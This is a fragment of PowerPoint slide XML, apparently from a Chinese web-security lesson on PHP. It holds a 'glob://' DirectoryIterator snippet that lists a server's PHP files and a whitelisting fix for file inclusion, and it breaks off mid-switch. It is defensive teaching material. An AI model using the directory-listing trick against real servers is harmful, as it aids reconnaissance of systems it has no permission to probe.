              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>$it = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DirectoryIterator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>("glob://E:\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>wamp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>\\www\\test\\*.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>foreach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>($it as $f) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="mr-IN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>　　　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>("%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>: %.1FK\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>", $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>getFilename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(), $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>getSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>()/1024);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="mr-IN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>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62</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1659525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mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = $_GET['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'];  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Whitelisting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>possible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>values</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>switch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> ($file) {  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>case</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>':  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>case</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>':  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>case</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> 'bar':  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> ‘/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>home</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>wwwroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>default</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/’ .$file .‘.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>’;//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="pl-PL" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>已知的敏感文件路径  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>break</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>;  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>default</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>:  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
